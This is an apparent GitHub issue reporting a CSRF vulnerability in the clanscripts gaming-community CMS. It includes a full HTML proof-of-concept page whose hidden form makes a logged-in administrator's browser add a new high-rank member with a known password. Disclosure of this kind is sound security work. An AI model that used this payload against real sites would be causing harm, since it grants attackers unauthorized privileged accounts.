search

bluethrust / clanscripts

A CMS built for Clans, Guilds and Gaming Communities
http://www.bluethrust.com
Other
10 stars 9 forks source link

There is one CSRF vulnerability that can add the High Rank account #27

Open rebootORZ opened 5 years ago

rebootORZ commented 5 years ago

After the administrator logged in, open the following one page one.html add a High Rank account. 

<!DOCTYPE html>
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/members/console.php?cID=5" method="POST">
      <input type="hidden" name="newmember" value="test2" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="set&#95;rank" value="41" />
      <input type="hidden" name="submit" value="Add&#32;New&#32;Member" />
      <input type="hidden" name="checkCSRF" value="034afa58abf045d046ce7dba7b1b125e" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>